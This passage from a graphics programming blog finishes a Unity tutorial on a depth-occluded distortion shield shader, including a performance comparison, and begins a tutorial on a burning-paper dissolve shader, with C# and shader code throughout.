<span class="n">shieldCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">=</span> <span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">);</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">fieldOfView</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">fieldOfView</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">orthographic</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">orthographic</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">orthographicSize</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">orthographicSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">(){...}</span></code></pre></figure>
<p>Notice that we also added a line to remove the Shield layer from the main camera’s culling mask. Now that we have a second camera rendering the shields for us, the main camera doesn’t need to create draw calls that incorrectly render the shield colour.</p>
<div align="center">
<img src="/images/post_images/2016-1-15/third_distort.gif" />
<br />
<br />
</div>
<p>With this change, our shield looks a lot better, but like I said, this has exacerbated another problem we have. Earlier we accepted that our distortion effect wasn’t going to have depth information, and therefore would distort things in front of the shield, but now, we also don’t have depth information for the shield colour itself, which means that shields will render on top of everything else. This is much more noticeable, and makes this effect really unwieldy, so we’re going to have to do something about that.</p>
<div align="center">
<img src="/images/post_images/2016-1-15/depth_problem.png" />
<br />
<br />
</div>
<h2>From Full Screen Effect to Projective Texturing</h2>
<p>Buckle up, things are about to get fun.</p>
<p>All the problems that we have right now are due to us treating the shields like they aren’t geometry: we’re rendering them to a buffer to distort the whole screen, and then using a secondary camera which has no depth information to paste them over the rest of the game. Wouldn’t it be great if we could use our depth buffer to occlude both the distortion and colours of the shield?</p>
<p>In the past, I’ve seen this done by manually calculating a depth pass, but this is expensive and requires you to double the draw calls of everything you want included in the depth buffer that you’re going to use to occlude your warp effect; so instead of doing that, here’s what we’re going to do today:</p>
<ul>
<li>Render the main camera (without warp) to a render texture</li>
<li>Render the multi colored shield buffer as usual</li>
<li>Copy the main camera render texture to the buffer that the shield camera will draw into</li>
<li>Share a depth buffer between our main camera and our shield camera so that our shields are occluded properly without incurring extra draw calls</li>
<li>Continue to render our shields after everything else, but pass the main camera render texture to our shield shaders, and let them deal with the warp effect themselves so that when the shield is occluded, the warp effect is occluded too</li>
<li>Blit the shield camera render texture to the screen</li>
</ul>
<p>It’s a lot of changes, but at the end of the day we’re going to end up with a really really easy to use shield bubble effect that behaves exactly like we expect it should without incurring extra draw calls or doing a lot of extra full screen operations. So without further ado, let’s take it from the top!</p>
<h3>Rendering the main camera to a render texture</h3>
<p>The first part of this list should be pretty easy after all the work with render textures we did above. In fact we’re already rendering the main camera to a render texture (the screenRT) so we’re actually in good shape.</p>
<p>First of all, we need to stop our main camera from blitting to the screen, and we need to set our offscreen buffer to a global shader uniform so we can access it later. We’re going to change our OnPostRender function in our C# script from this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">effectMaterial</span><span class="p">.</span><span class="n">SetTexture</span><span class="p">(</span><span class="s">"_DistortionTex"</span><span class="p">,</span> <span class="n">shieldRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">effectMaterial</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>To this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">Shader</span><span class="p">.</span><span class="n">SetGlobalTexture</span><span class="p">(</span><span class="s">"_DistortionBuffer"</span><span class="p">,</span> <span class="n">shieldRT</span><span class="p">);</span>
<span class="n">Shader</span><span class="p">.</span><span class="n">SetGlobalTexture</span><span class="p">(</span><span class="s">"_ScreenBuffer"</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="n">finalRT</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>One important thing to note here is that if you want objects which have warp to be seen through each other, you’re going to have to render them to this buffer. For our shields, the easiest way to do this is to create a duplicate shield sphere, assign it the optimized (non warp) shader, child it to the original shield sphere and make sure it isn’t on the Shield layer. This isn’t going to work in all cases, but it will for our purposes today.</p>
<p>Notice that we’re no longer going to be setting properties of the composite material. This is because with our new approach, the composite material’s logic is going to be handled by the shield shader, so we don’t actually need the composite any more.</p>
<p>You may also have noticed that the code above references a new RenderTexture. About that:</p>
<h3>Two New RenderTextures</h3>
<p>Steps three and four of our new technique hint at some new render textures that we’re going to need. The first of these is our finalRT. This is the render texture that the camera rendering our warp objects will write into. We’ve already got the code to copy our main camera’s output into that texture like we said we’d do, but we also need to set up this render texture. We also need to set up a render texture specifically for storing the depth buffer from the main camera so that we can pass that to our shield camera as well.</p>
<p>Our new Awake function should look like the following:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">finalRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">depthRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">distortCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">shieldCam</span><span class="p">;</span>
<span class="n">Shader</span> <span class="n">shieldReplacementShader</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">finalRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">finalRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">depthRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Depth</span><span class="p">);</span>
<span class="n">depthRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldReplacementShader</span> <span class="o">=</span> <span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Replacement"</span><span class="p">);</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">depthRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">&=</span> <span class="o">~</span><span class="p">(</span><span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">));</span>
<span class="n">distortCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"DistortionCam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">shieldCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"Shield Cam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">finalRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">depthRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">...</span></code></pre></figure>
<p>Excellent! Now we have to make sure that our shieldCam is set to not clear anything before it renders, since we are now very deliberately populating its buffers with data from our main camera:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="o">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Nothing</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span></code></pre></figure>
<p>And finally, you may notice that we’re not actually drawing anything to the screen anymore. We need to tell our shieldCam that it’s cool to render everything to the frame buffer when it’s done. I like to keep as much of the logic for an effect within the same script as I can, so I did this by adding a new function to our effect script, and putting a component on the shield camera to call this inside an OnPostRender call. You can find a scene with everything set up like this in the code dump at the end of the article.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="kt">void</span> <span class="nf">BlitToScreen</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">finalRT</span><span class="p">,</span> <span class="p">(</span><span class="n">RenderTexture</span><span class="p">)</span><span class="n">null</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">DiscardContents</span><span class="p">();</span>
<span class="n">finalRT</span><span class="p">.</span><span class="n">DiscardContents</span><span class="p">();</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">DiscardContents</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that we also discard the contents of our render textures in this function, since we don’t need them any more once the frame has been copied to the screen.</p>
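<p>The component that sits on the shield camera isn’t shown here, so as a minimal sketch (not necessarily what the project in the code dump does), it could look something like this. The PostRenderRelay class and its onPostRender field are names made up for illustration; the only thing relied on from Unity is that OnPostRender is called on scripts attached to a camera once that camera has finished rendering.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">using System;
using UnityEngine;

// Hypothetical helper, not taken from the original project: attach it to the
// shield camera's GameObject so that OnPostRender fires for that camera.
public class PostRenderRelay : MonoBehaviour
{
    // Assigned by the effect script, for example to its BlitToScreen method.
    public Action onPostRender;

    void OnPostRender()
    {
        // Forward the camera's post render event if anything is listening.
        if (onPostRender != null)
        {
            onPostRender();
        }
    }
}</code></pre></figure>
<p>The effect script would add this component to the shield camera in Awake and point onPostRender at BlitToScreen, which keeps all of the blit logic inside the effect script itself.</p>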
<h3>Warping Inside our Fragment Shaders</h3>
<p>There’s one last thing we need to do to finish this effect, and that’s to move the logic that used to live in our composite shader to the shader we use to draw our shields. There’s a completed shader at the end of this article but all we’re doing is adding uniforms to the shader so we can see the screenRT and shieldRT (the warp buffer), and then filling in areas of our object that would be transparent if we were alpha blending with a distorted lookup into screenRT. The addition to the fragment shader looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">float3</span> <span class="n">viewdir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">_WorldSpaceCameraPos</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">worldPos</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">ang</span> <span class="o">=</span> <span class="mi">1</span> <span class="o">-</span> <span class="p">(</span><span class="n">abs</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">viewdir</span><span class="p">,</span> <span class="n">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">normal</span><span class="p">))));</span>
<span class="n">half4</span> <span class="n">rimCol</span> <span class="o">=</span> <span class="n">_RimColor</span> <span class="o">*</span> <span class="n">pow</span><span class="p">(</span><span class="n">ang</span><span class="p">,</span> <span class="n">_RimPower</span><span class="p">)</span> <span class="o">*</span> <span class="n">_RimIntensity</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">texColor</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">texcoord</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">rimCol</span> <span class="o">*</span> <span class="n">texColor</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">screen</span> <span class="o">=</span> <span class="n">ComputeScreenPos</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">objectPos</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">distortion</span> <span class="o">=</span> <span class="n">tex2Dproj</span><span class="p">(</span><span class="n">_DistortionBuffer</span><span class="p">,</span> <span class="n">UNITY_PROJ_COORD</span><span class="p">(</span><span class="n">screen</span><span class="p">));</span>
<span class="n">float4</span> <span class="n">screenPos</span> <span class="o">=</span> <span class="n">screen</span><span class="p">;</span>
<span class="n">screenPos</span><span class="p">.</span><span class="n">xy</span> <span class="o">=</span> <span class="n">screenPos</span><span class="p">.</span><span class="n">xy</span> <span class="o">-</span> <span class="p">(</span><span class="n">distortion</span><span class="p">.</span><span class="n">rb</span> <span class="o">-</span> <span class="mf">0.5</span><span class="p">)</span> <span class="o">*</span> <span class="mf">1.5</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">d</span> <span class="o">=</span> <span class="n">tex2Dproj</span><span class="p">(</span><span class="n">_ScreenBuffer</span><span class="p">,</span> <span class="n">UNITY_PROJ_COORD</span><span class="p">(</span><span class="n">screenPos</span><span class="p">));</span>
<span class="k">return</span> <span class="n">tex</span> <span class="o">+</span> <span class="n">d</span> <span class="o">+</span> <span class="n">texColor</span> <span class="o">*</span> <span class="nf">CalcShieldIntensity16</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">);</span>
<span class="err">}</span></code></pre></figure>
<p>The ComputeScreenPos function and the UNITY_PROJ_COORD macro do most of the hard work for us here, but you can see where we’ve basically lifted the logic completely from the composite shader and added it here. This is going to make our 100% opaque objects look like they’re alpha blending with a warp effect. It also lets our warp effect be occluded by geometry and by other warp effects, and if you took my advice and wrote out a non warp version of the shield to the main camera, you can see one shield through another. All of this put together might look something like this:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/spaceshipfinal.gif" />
<br />
<br />
</div>
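<p>To make the lookup arithmetic in that fragment shader a bit more concrete, here’s a CPU-side sketch of the same math in plain C#, for a single axis. The WarpOffsetCheck class and its method names are made up for illustration, and it assumes the usual behaviour of tex2Dproj, which divides the coordinate by w before sampling.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">using System;

public static class WarpOffsetCheck
{
    // Mirrors (distortion.rb - 0.5) * 1.5 for one channel of the warp buffer.
    public static float Offset(float bufferChannel)
    {
        return (bufferChannel - 0.5f) * 1.5f;
    }

    // Mirrors one axis of the _ScreenBuffer lookup: subtract the offset from
    // the screen position, then apply the divide by w that tex2Dproj performs.
    public static float WarpedCoord(float screenCoord, float w, float bufferChannel)
    {
        return (screenCoord - Offset(bufferChannel)) / w;
    }

    public static void Main()
    {
        // A buffer value of 0.5 is neutral: the lookup is left untouched.
        Console.WriteLine(WarpedCoord(0.5f, 1.0f, 0.5f));
        // Values above or below 0.5 push the lookup one way or the other.
        Console.WriteLine(Offset(1.0f));
        Console.WriteLine(Offset(0.0f));
        // The same buffer value moves the lookup less when w is larger.
        Console.WriteLine(WarpedCoord(1.0f, 2.0f, 1.0f));
    }
}</code></pre></figure>
<p>Because the offset is subtracted before the projective divide, its effect on the final lookup is scaled by 1/w, so with a perspective camera a shield that is further away should bend the screen behind it a little less.</p>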
<p>When you look at the final shader I have posted in the google drive, you’ll also notice that I’ve added a second pass to it so that we can properly show the shield impacts on the side of the shield behind the ship we’re looking at. I skipped over the distortion effect in that pass to make it a bit more performant, but I wanted to keep the shield impacts so that the player could see all the directions that they were being shot at from. Again, this is open to interpretation, as it does make the shader much more expensive.</p>
<p>And at last, that’s everything!</p>
<h2>How Expensive Is This</h2>
<p>So the inevitable question that’s always (rightly) asked about cool graphics code is “how expensive is it?” So before we wrap up for today, let’s do a quick performance analysis of our new shield versus the original shield posted and figure out exactly what using either of them means for our performance. Since virtually all my Unity experience is on mobile, let’s look at this like our intended target is a mobile device.</p>
<p>On the draw call front, the original shader from Warfleet comes in the lowest, with a single draw call. This is followed by my optimized version of the shader, which I added a draw call to so that we could render the inside/back face of the sphere’s impacts as well. Our post effect version comes in last, with a draw call to render the shield to our buffer, and 1 draw call per side of the shield that we’re rendering.</p>
<p>It’s worth noting that if all you’re looking for is a more performant version of the original effect, you could remove the back face pass in the optimized version and be there.</p>
<p>Finally, I’ve set up a small test scene to see what the on device cost of the effect is. The scene is simple enough: whenever I tap the screen I spawn another instance of the shield and offset it a bit from the first one. I’ve turned on the on board profiler on an iPhone 6 to grab the performance data over time. It’s not a perfect test, but the test scene is consistent across every shader so at least the numbers will be useful. Here are the results:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/performance.png" />
<br />
<br />
</div>
<p>Remember that these results are from a Metal-capable device (which means the cost of a draw call is lower than you’d see on OpenGL), so these numbers are only useful relative to each other, and not as an absolute measure of the cost of these shaders on any device except the iPhone 6.</p>
<h2>Conclusion</h2>
<p>That should do it! As mentioned above, the source for everything here can be found on Google Drive <a href="https://drive.google.com/folderview?id=0B85AH3b17yxpaHRrVVVVWmpnNVk&usp=sharing">here</a>. Hopefully this has been helpful enough that you don’t feel limited to just making sci fi shields, but feel like you can go forth and create refraction shaders, heat haze, whatever!</p>
<p>If you have any questions about anything, spot a mistake, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>.</p>
<p>Happy shading!</p>
A Burning Paper Shader2015-11-10T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2015/11/10/Dissolve-Shader-Redux<p>After a long hiatus, I’ve decided to start posting again! And I can think of no better way to kick that off than with revisiting a <a href="http://kylehalladay.com/blog/tutorial/bestof/2013/09/28/How-to-dissolve-effect.html">cheesy old shader</a> that I posted 2 years ago.</p>
<p>So today we’re revisiting the “Dissolve” shader effect. I’ve seen this effect pop up more and more lately, mostly on 2D elements (like in <a href="https://youtu.be/1a80WbuwGWw?t=6m19s">Hearthstone</a> and <a href="https://youtu.be/9DIV8Hwy4n0?t=46s">Armello</a>), so today we’re going to see what we can get working on a plane, and then torch an unsuspecting 3D fence.</p>
<p>Ok, enough intro! Let’s take a look at what we’re building:</p>
<div align="center">
<img src="/images/post_images/2015-10-27/targetdissolve.gif" />
<br />
<br />
</div>
<h2>Breaking things down</h2>
<p>To start, let’s get the core part of the effect down: dissolving a mesh based on a texture. This is the easiest part to get right, since there really isn’t any need for artistic interpretation. You probably noticed that the above gif starts dissolving from one point and works its way across the quad. We’ll get to that, but let’s dissolve the entire quad uniformly first. Like so:</p>
<div align="center">
<img src="/images/post_images/2015-10-27/simpledissolve.gif" />
<br />
<br />
</div>
<p>All we need to achieve this is a texture to use as our dissolve control texture. This can be anything (and in some cases using the diffuse texture of the object yields really cool results), but for the most general purpose control texture, use a smoothed noise texture. You can google around for these, or create your own. One thing you’re going to want to look for is one with a reasonably good contrast, which is going to give you a really nice range for your dissolve effect.</p>
<p>Before we write any code, let’s get our math sorted out first. We want to expose a constant value which controls the dissolve effect (0 for completely dissolved, 1 for totally not dissolved), which I’m going to refer to as _DissolveValue for the rest of the post. Then we need to look up the colour value in the control texture for the fragment we’re currently shading and add that value to _DissolveValue. This gets us the following:</p>
<ul>
<li>Before the effect starts (_DissolveValue == 1), at pure black in the noise texture, our sum will be 1</li>
<li>When the effect ends (_DissolveValue == 0), at pure white in our noise texture, our sum will be 1</li>
</ul>
<p>Since we want to make sure that at the end, every pixel is transparent, we need to clamp our noise value to a maximum of 0.99, which will allow us to make the blanket statement that we can set any pixel whose sum is < 1 to transparent.</p>
<p>As a fragment function, the above logic might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">mainTex</span><span class="p">.</span><span class="n">a</span> <span class="o">*=</span> <span class="n">floor</span><span class="p">(</span><span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">min</span><span class="p">(</span><span class="mf">0.99</span><span class="p">,</span><span class="n">noiseVal</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>For brevity’s sake I’m going to omit posting the whole shader source as we work through it, but the full source is at the bottom of this article so if you’re stuck just jump down there and fill in any blanks.</p>
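<p>If you want to sanity check the floor trick without opening Unity, here’s a small CPU-side sketch of the same math in plain C#. The DissolveCheck class and the AlphaMask name are just for illustration; the arithmetic mirrors the fragment function above.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">using System;

public static class DissolveCheck
{
    // Mirrors floor(_DissolveValue + min(0.99, noiseVal)) from the fragment function.
    // Returns 1 for a pixel that stays visible and 0 for one that has dissolved.
    public static float AlphaMask(float dissolveValue, float noiseVal)
    {
        float clampedNoise = Math.Min(0.99f, noiseVal);
        return (float)Math.Floor(dissolveValue + clampedNoise);
    }

    public static void Main()
    {
        // Untouched mesh: even pure black noise keeps the pixel.
        Console.WriteLine(AlphaMask(1.0f, 0.0f));
        // Fully dissolved: even pure white noise is clamped below 1.
        Console.WriteLine(AlphaMask(0.0f, 1.0f));
        // Half way: only the brighter half of the noise survives.
        Console.WriteLine(AlphaMask(0.5f, 0.25f));
        Console.WriteLine(AlphaMask(0.5f, 0.75f));
    }
}</code></pre></figure>
<p>Running this prints 1, 0, 0 and 1, which matches the two end cases listed earlier and shows the noise texture deciding which pixels go first in between.</p>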
<h2>The Edge Details</h2>
<p>Ok, so we have our basic effect now, but it doesn’t really look like anything other than a janky shader effect, and I’ve found that in general “janky shader” isn’t high up on the things commonly asked for by artists. Let’s add some colour to the edges of the dissolve effect.</p>
<p>To do this, we’re going to use a gradient to control the colours of the edge, and we’ll use the alpha channel of that gradient to control our fragment’s alpha as the effect progresses. The leftmost pixel in the gradient will be our fully dissolved value, with an alpha of 0, while the rightmost pixel will be a completely untouched pixel with alpha of 1 and a colour value of white. What you put in between these two values is up to you, but for the effect I’m building, my gradient looks like this:</p>
<div align="left">
<img src="/images/post_images/2015-10-27/burngradient.png" />
<br />
</div>
<p>Instead of multiplying our alpha as we did before, this time we’re going to multiply the entire colour value of our pixel by a point in our gradient. As before, we want to make sure that a _DissolveValue of 1 is a fully untouched mesh, and when it’s 0, we have a fully transparent mesh. This changes our requirements for our math a little bit since we can’t just floor the sum and get a hard line between 1 and <1. We need to make sure that when _DissolveValue is 1, we are at an X value of 1, regardless of our noise texture, but we still want to make sure that at a _DissolveValue of 0 that we’re at an X value of 0 regardless of the value in our noise texture.</p>
<p>This might sound tricky, but it isn’t, as long as you set the wrap mode of your gradient to “clamp,” so that lookups outside the range of 0 to 1 resolve to the edge pixels of the gradient. Provided that’s set up correctly, the following will work just fine:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">d</span> <span class="o">=</span> <span class="p">(</span><span class="mf">2.0</span> <span class="o">*</span> <span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">noiseVal</span><span class="p">)</span> <span class="o">-</span> <span class="mf">1.0</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">overOne</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">d</span> <span class="o">*</span> <span class="n">_GradientAdjust</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">burn</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_BurnGradient</span><span class="p">,</span> <span class="n">float2</span><span class="p">(</span> <span class="n">overOne</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span> <span class="o">*</span> <span class="n">burn</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>The _GradientAdjust parameter isn’t necessary to make the effect work, but it provides a great deal of control over how tight you want the edges of your effect to be (just make sure that its value is greater than 1). I found that with the gradient I was using, setting that parameter to 2 produced reasonably good results, which looked like this:</p>
<div align="right">
<img src="/images/post_images/2015-10-27/gradientdissolve.gif" />
<br />
</div>
<p>Notice that in the gif above, nothing really happens until we hit about _DissolveValue 0.5. This depends on the range of your noise texture: a higher contrast texture will show dissolve effects starting earlier and ending later.</p>
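<p>To sanity check the endpoint behaviour described above, here is a small CPU-side sketch of the same arithmetic in plain C++. It is not shader code, and the names <code>saturate</code> and <code>gradientCoord</code> are just illustrative stand-ins for what the fragment function does to a single pixel.</p>

```cpp
#include <algorithm>

// CPU-side stand-in for the shader's saturate(): clamp to [0, 1].
float saturate(float x) { return std::min(1.0f, std::max(0.0f, x)); }

// Same arithmetic as the fragment function, for one pixel.
// Returns the X coordinate used to look up the burn gradient.
float gradientCoord(float dissolveValue, float noiseVal, float gradientAdjust)
{
    // At dissolveValue 1: d = 1 + noise, which is >= 1 for any noise in [0, 1].
    // At dissolveValue 0: d = noise - 1, which is <= 0 for any noise in [0, 1].
    float d = (2.0f * dissolveValue + noiseVal) - 1.0f;
    return saturate(d * gradientAdjust);
}
```

<p>With a mid-grey noise value of 0.5 and a _GradientAdjust of 2, this coordinate stays pinned at 1 until _DissolveValue drops below 0.5, which lines up with the late start visible in the gif.</p>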
<h2>Making This Useful</h2>
<p>What we have right now looks pretty good, but it isn’t very useful. I think it’s safe to say that in almost every situation where this effect would look good, it would look way better if the effect came from one direction, or for our purposes today, started at a specific point.</p>
<p>Since we want the dissolve effect to radiate out from a point, what we need to do is define a function which will:</p>
<ul>
<li>Return 1 when _DissolveValue is 1</li>
<li>Return 0 when _DissolveValue is 0</li>
